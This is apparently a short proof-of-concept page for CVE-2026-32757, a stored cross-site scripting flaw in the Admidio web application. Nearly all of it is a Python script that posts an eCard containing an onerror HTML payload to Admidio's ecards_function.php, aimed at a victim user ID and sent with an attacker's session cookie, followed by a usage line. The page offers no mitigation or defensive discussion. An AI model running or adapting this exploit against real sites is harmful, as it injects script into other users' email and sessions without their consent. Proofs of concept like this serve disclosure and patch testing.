CVE-2026-32757 Admidio 存储型XSS漏洞

# PoC for CVE-2026-32757 import requests def exploit(target_url, session_cookie): headers = { "Cookie": session_cookie } # Malicious payload to be injected into the email body payload_data = { "ecard_message": "<img src=x onerror=alert('CVE-2026-32757')>", "ecard_recipients": "2", # ID of the victim user # Other required form fields omitted for brevity } # Sending the malicious eCard response = requests.post(f"{target_url}/adm_program/modules/ecards/ecards_function.php", data=payload_data, headers=headers) if response.status_code == 200: print("[+] Payload sent successfully. Check the victim's email.") else: print("[-] Failed to send payload.") # Usage # exploit("http://target-site.com", "PHPSESSID=attacker_session_id")